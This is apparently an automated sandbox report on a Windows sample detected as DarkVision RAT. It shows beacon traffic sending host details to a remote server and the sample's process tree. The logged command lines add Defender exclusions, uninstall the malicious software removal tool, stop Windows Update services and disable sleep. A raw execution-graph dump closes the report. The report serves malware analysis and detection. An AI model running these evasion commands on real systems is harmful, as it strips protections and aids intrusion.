                                                                          7 | 192.168.2.6 | 50012 | 154.216.20.243 | 443 | 6196 | C:\Windows\explorer.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-12-08 14:09:46 UTC | 179 | OUT | POST /66/api/endpoint.php HTTP/1.1
                                                                          Accept: */*
                                                                          Connection: close
                                                                          Content-Length: 523
                                                                          Content-Type: application/json
                                                                          Host: woo097878781.win
                                                                          User-Agent: cpp-httplib/0.12.6
                                                                          2024-12-08 14:09:46 UTC | 523 | OUT | Data Raw: 7b 22 69 64 22 3a 22 6f 6d 73 69 68 6c 6f 79 77 66 61 6c 79 72 6f 62 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 36 34 38 33 35 31 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 36 34 38 33 35 31 22 2c 22 67 70 75 22 3a 22 4d 36 36 39 4c 41 38 22 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 2c 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c 22 72 65 6d 6f 74 65 63 6f 6e 66 69 67 22 3a 22 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 33 2e 34 2e 31 22 2c 22 61 63 74 69 76 65 77 69 6e 64 6f 77 22 3a 22 43 3a 5c 5c 57 69 6e 64 6f 77 73 5c 5c 65 78 70 6c 6f 72 65 72 2e 65 78 65 20 2d 20 50 72 6f
                                                                          Data Ascii: {"id":"omsihloywfalyrob","computername":"648351","username":"648351","gpu":"M669LA8","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Pro
                                                                          2024-12-08 14:09:47 UTC | 264 | IN | HTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Sun, 08 Dec 2024 14:09:46 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          X-Powered-By: PHP/8.3.14
                                                                          X-Robots-Tag: noindex, nofollow
                                                                          Vary: Accept-Encoding
                                                                          X-Powered-By: PleskLin
                                                                          2024-12-08 14:09:47 UTC | 12 | IN | Data Raw: 32 0d 0a 7b 7d 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 2{}0


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          8 | 192.168.2.6 | 50021 | 154.216.20.243 | 443 | 6196 | C:\Windows\explorer.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-12-08 14:10:41 UTC | 179 | OUT | POST /66/api/endpoint.php HTTP/1.1
                                                                          Accept: */*
                                                                          Connection: close
                                                                          Content-Length: 523
                                                                          Content-Type: application/json
                                                                          Host: woo097878781.win
                                                                          User-Agent: cpp-httplib/0.12.6
                                                                          2024-12-08 14:10:41 UTC | 523 | OUT | Data Raw: 7b 22 69 64 22 3a 22 6f 6d 73 69 68 6c 6f 79 77 66 61 6c 79 72 6f 62 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 36 34 38 33 35 31 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 36 34 38 33 35 31 22 2c 22 67 70 75 22 3a 22 4d 36 36 39 4c 41 38 22 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 2c 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c 22 72 65 6d 6f 74 65 63 6f 6e 66 69 67 22 3a 22 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 33 2e 34 2e 31 22 2c 22 61 63 74 69 76 65 77 69 6e 64 6f 77 22 3a 22 43 3a 5c 5c 57 69 6e 64 6f 77 73 5c 5c 65 78 70 6c 6f 72 65 72 2e 65 78 65 20 2d 20 50 72 6f
                                                                          Data Ascii: {"id":"omsihloywfalyrob","computername":"648351","username":"648351","gpu":"M669LA8","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Pro
                                                                          2024-12-08 14:10:42 UTC | 264 | IN | HTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Sun, 08 Dec 2024 14:10:42 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          X-Powered-By: PHP/8.3.14
                                                                          X-Robots-Tag: noindex, nofollow
                                                                          Vary: Accept-Encoding
                                                                          X-Powered-By: PleskLin
                                                                          2024-12-08 14:10:42 UTC | 12 | IN | Data Raw: 32 0d 0a 7b 7d 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 2{}0


                                                                          Target ID:0
                                                                          Start time:09:07:00
                                                                          Start date:08/12/2024
                                                                          Path:C:\Users\user\Desktop\file.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\file.exe"
                                                                          Imagebase:0x7c0000
                                                                          File size:515'584 bytes
                                                                          MD5 hash:05BBEBA85B66E05630AB53ABE2F0864E
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000000.00000000.2115394584.00000000007F2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.2115394584.00000000007F2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000000.00000003.2116236371.0000000002801000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000003.2116236371.0000000002801000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000000.00000002.2119261652.0000000002800000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2119261652.0000000002800000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:1
                                                                          Start time:09:07:00
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\cmd.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe','C:\ProgramData'
                                                                          Imagebase:0x7ff6441f0000
                                                                          File size:289'792 bytes
                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:3
                                                                          Start time:09:07:00
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff66e660000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:4
                                                                          Start time:09:07:00
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\explorer.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\explorer.exe"
                                                                          Imagebase:0x7ff609140000
                                                                          File size:5'141'208 bytes
                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          Target ID:5
                                                                          Start time:09:07:00
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe','C:\ProgramData'
                                                                          Imagebase:0x7ff6e3d50000
                                                                          File size:452'608 bytes
                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:8
                                                                          Start time:09:07:28
                                                                          Start date:08/12/2024
                                                                          Path:C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe" ""
                                                                          Imagebase:0x7ff60aa90000
                                                                          File size:2'590'208 bytes
                                                                          MD5 hash:FD863BAB145A20D25E45177DA0E56EFC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:9
                                                                          Start time:09:07:28
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                          Imagebase:0x7ff6e3d50000
                                                                          File size:452'608 bytes
                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:10
                                                                          Start time:09:07:28
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff66e660000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:11
                                                                          Start time:09:07:31
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\cmd.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                          Imagebase:0x7ff6441f0000
                                                                          File size:289'792 bytes
                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:12
                                                                          Start time:09:07:31
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\sc.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                                          Imagebase:0x7ff7f82e0000
                                                                          File size:72'192 bytes
                                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:13
                                                                          Start time:09:07:31
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff66e660000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:14
                                                                          Start time:09:07:31
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff66e660000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:15
                                                                          Start time:09:07:31
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\wusa.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                          Imagebase:0x7ff6c27a0000
                                                                          File size:345'088 bytes
                                                                          MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:16
                                                                          Start time:09:07:31
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\sc.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                          Imagebase:0x7ff7f82e0000
                                                                          File size:72'192 bytes
                                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:17
                                                                          Start time:09:07:31
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff66e660000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:18
                                                                          Start time:09:07:31
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\sc.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                                          Imagebase:0x7ff7f82e0000
                                                                          File size:72'192 bytes
                                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:19
                                                                          Start time:09:07:31
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff66e660000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:20
                                                                          Start time:09:07:31
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\sc.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\sc.exe stop bits
                                                                          Imagebase:0x7ff7f82e0000
                                                                          File size:72'192 bytes
                                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:21
                                                                          Start time:09:07:31
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff66e660000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:22
                                                                          Start time:09:07:31
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\sc.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                                          Imagebase:0x7ff7f82e0000
                                                                          File size:72'192 bytes
                                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:23
                                                                          Start time:09:07:31
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff66e660000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:24
                                                                          Start time:09:07:31
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\powercfg.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                          Imagebase:0x7ff603010000
                                                                          File size:96'256 bytes
                                                                          MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:25
                                                                          Start time:09:07:31
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\powercfg.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                          Imagebase:0x7ff603010000
                                                                          File size:96'256 bytes
                                                                          MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:26
                                                                          Start time:09:07:31
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff66e660000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:27
                                                                          Start time:09:07:31
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\powercfg.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                          Imagebase:0x7ff603010000
                                                                          File size:96'256 bytes
                                                                          MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:28
                                                                          Start time:09:07:31
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff66e660000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:29
                                                                          Start time:09:07:31
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\powercfg.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                          Imagebase:0x7ff7934f0000
                                                                          File size:96'256 bytes
                                                                          MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:30
                                                                          Start time:09:07:31
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff66e660000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:31
                                                                          Start time:09:07:31
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff66e660000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:32
                                                                          Start time:09:07:32
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\explorer.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:explorer.exe
                                                                          Imagebase:0x7ff609140000
                                                                          File size:5'141'208 bytes
                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:false

                                                                          Target ID:33
                                                                          Start time:09:07:33
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\explorer.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\EXPLORER.EXE {D4D7F2EA-38C9-468B-BF0E-B76E00A488F0}
                                                                          Imagebase:0x7ff609140000
                                                                          File size:5'141'208 bytes
                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:35
                                                                          Start time:09:09:17
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\explorer.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\EXPLORER.EXE {D4D7F2EA-38C9-468B-BF0E-B76E00A488F0}
                                                                          Imagebase:0x7ff799c70000
                                                                          File size:5'141'208 bytes
                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:36
                                                                          Start time:09:10:42
                                                                          Start date:08/12/2024
                                                                          Path:C:\Windows\explorer.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\EXPLORER.EXE {D4D7F2EA-38C9-468B-BF0E-B76E00A488F0}
                                                                          Imagebase:0x7ff609140000
                                                                          File size:5'141'208 bytes
                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                            Execution Graph

                                                                            Execution Coverage:4.2%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:17.5%
                                                                            Total number of Nodes:2000
                                                                            Total number of Limit Nodes:50
GetProcAddress 18621->18627 18622->18625 18629 7d83fb 18622->18629 18623->18619 18623->18620 18624->18618 18624->18620 18625->17616 18625->17617 18626 7d84d5 LoadLibraryW 18626->18625 18636 7d84f0 18626->18636 18627->18620 18627->18621 18628 7d848a GetProcAddress 18628->18620 18628->18629 18629->18626 18633 7d8423 18629->18633 18630 7d8449 GetProcAddress 18630->18620 18630->18633 18631 7d85ca LoadLibraryW 18631->18625 18638 7d85e5 18631->18638 18632 7d857f GetProcAddress 18632->18620 18632->18636 18633->18628 18633->18629 18633->18630 18634 7d853e GetProcAddress 18634->18625 18634->18636 18635 7d86bf LoadLibraryW 18635->18625 18643 7d86da 18635->18643 18636->18631 18636->18632 18636->18634 18637 7d8674 GetProcAddress 18637->18620 18637->18638 18638->18635 18641 7d860d 18638->18641 18639 7d8633 GetProcAddress 18639->18620 18639->18641 18640 7d87b4 LoadLibraryW 18640->18625 18648 7d87cf 18640->18648 18641->18637 18641->18638 18641->18639 18642 7d8769 GetProcAddress 18642->18620 18642->18643 18643->18640 18647 7d8702 18643->18647 18644 7d88a9 LoadLibraryW 18644->18625 18653 7d88c4 18644->18653 18645 7d8728 GetProcAddress 18645->18620 18645->18647 18646 7d885e GetProcAddress 18646->18620 18646->18648 18647->18642 18647->18643 18647->18645 18648->18644 18652 7d87f7 18648->18652 18649 7d899e LoadLibraryW 18649->18625 18658 7d89b9 18649->18658 18650 7d881d GetProcAddress 18650->18620 18650->18652 18651 7d8953 GetProcAddress 18651->18620 18651->18653 18652->18646 18652->18648 18652->18650 18653->18649 18657 7d88ec 18653->18657 18654 7d8a93 LoadLibraryW 18654->18625 18663 7d8aae 18654->18663 18655 7d8912 GetProcAddress 18655->18620 18655->18657 18656 7d8a48 GetProcAddress 18656->18620 18656->18658 18657->18651 18657->18653 18657->18655 18658->18654 18662 7d89e1 18658->18662 18659 7d8b88 LoadLibraryW 18659->18625 18668 7d8ba3 18659->18668 18660 7d8a07 GetProcAddress 18660->18620 18660->18662 18661 7d8b3d GetProcAddress 18661->18620 18661->18663 18662->18656 18662->18658 
18662->18660 18663->18659 18667 7d8ad6 18663->18667 18664 7d8c7d LoadLibraryW 18664->18625 18673 7d8c98 18664->18673 18665 7d8afc GetProcAddress 18665->18620 18665->18667 18666 7d8c32 GetProcAddress 18666->18620 18666->18668 18667->18661 18667->18663 18667->18665 18668->18664 18672 7d8bcb 18668->18672 18669 7d8bf1 GetProcAddress 18669->18620 18669->18672 18670 7d8d72 LoadLibraryW 18670->18625 18678 7d8d8d 18670->18678 18671 7d8d27 GetProcAddress 18671->18620 18671->18673 18672->18666 18672->18668 18672->18669 18673->18670 18676 7d8cc0 18673->18676 18674 7d8ce6 GetProcAddress 18674->18620 18674->18676 18675 7d8e67 LoadLibraryW 18675->18625 18686 7d8e82 18675->18686 18676->18671 18676->18673 18676->18674 18677 7d8e1c GetProcAddress 18677->18620 18677->18678 18678->18675 18681 7d8db5 18678->18681 18679 7d8ddb GetProcAddress 18679->18620 18679->18681 18680 7d8f5c LoadLibraryW 18680->18625 18689 7d8f77 18680->18689 18681->18677 18681->18678 18681->18679 18682 7d8f11 GetProcAddress 18682->18620 18682->18686 18683 7d9051 LoadLibraryW 18683->18625 18690 7d906c 18683->18690 18684 7d8ed0 GetProcAddress 18684->18625 18684->18686 18685 7d9006 GetProcAddress 18685->18620 18685->18689 18686->18680 18686->18682 18686->18684 18687 7d8fc5 GetProcAddress 18687->18625 18687->18689 18688 7d90f8 GetProcAddress 18688->18620 18688->18690 18689->18683 18689->18685 18689->18687 18690->18625 18692 7d9094 18690->18692 18691 7d90ba GetProcAddress 18691->18620 18691->18692 18692->18688 18692->18690 18692->18691 18694 7c9caa GetProcAddress 18693->18694 18695 7c1089 18693->18695 18696 7c9cc8 FreeLibrary 18694->18696 18697 7c9cc2 18694->18697 18698 7dc1e0 GetModuleHandleW GetProcAddress 18695->18698 18696->18695 18697->18696 18699 7dc21c GetCurrentProcess 18698->18699 18700 7c108e Wow64DisableWow64FsRedirection GetCurrentProcess CreateMutexW 18698->18700 18699->18700 18700->17626 18700->17627 18702 7d268d RegOpenKeyW 18701->18702 18703 7d26be 18701->18703 18702->18703 18704 7d26a5 RegDeleteValueW 
